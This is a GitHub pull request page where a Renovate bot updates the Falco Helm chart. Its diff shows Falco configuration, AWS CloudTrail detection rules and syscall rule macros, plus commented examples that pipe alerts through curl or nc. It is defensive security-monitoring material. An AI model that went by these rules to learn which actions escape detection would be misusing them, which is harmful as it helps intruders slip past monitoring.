Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update helm release falco to v1.19.4 - autoclosed #234

Closed
wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Jun 6, 2022

Mend Renovate

This PR contains the following updates:

Package Update Change
falco (source) minor 1.16.0 -> 1.19.4

⚠ Dependency Lookup Warnings ⚠

Warnings were logged while processing this repo. Please check the Dependency Dashboard for more information.


Release Notes

falcosecurity/charts

v1.19.4

Compare Source

Falco

v1.19.3

Compare Source

Falco

v1.19.2

Compare Source

Falco

v1.19.1

Compare Source

Falco

v1.19.0

Compare Source

Falco

v1.18.6

Compare Source

Falco

v1.18.5

Compare Source

Falco

v1.18.4

Compare Source

Falco

v1.18.3

Compare Source

Falco

v1.18.2

Compare Source

Falco

v1.18.1

Compare Source

Falco

v1.18.0

Compare Source

Falco

v1.17.6

Compare Source

Falco

v1.17.5

Compare Source

Falco

v1.17.4

Compare Source

Falco

v1.17.3

Compare Source

Falco

v1.17.2

Compare Source

Falco

v1.17.1

Compare Source

Falco

v1.17.0

Compare Source

Falco

v1.16.4

Compare Source

Falco

v1.16.3

Compare Source

Falco

v1.16.2

Compare Source

Falco

v1.16.1

Compare Source

Falco


Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.

@github-actions
Copy link
Contributor

github-actions bot commented Jun 6, 2022

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.18.5

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,7 +343,449 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
-  falco_rules.local.yaml: |
+  aws_cloudtrail_rules.yaml: |
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require engine version 10
+    - required_engine_version: 10
+
+    # These rules can be read by cloudtrail plugin version 0.1.0, or
+    # anything semver-compatible.
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled, this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+  falco_rules.local.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
     #
@@ -374,9 +816,9 @@
     #   tags: [users, container]
 
     # Or override/append to any rule, macro, or list from the Default Rules
-  falco_rules.yaml: |
+  falco_rules.yaml: |-
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +848,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +882,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1038,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
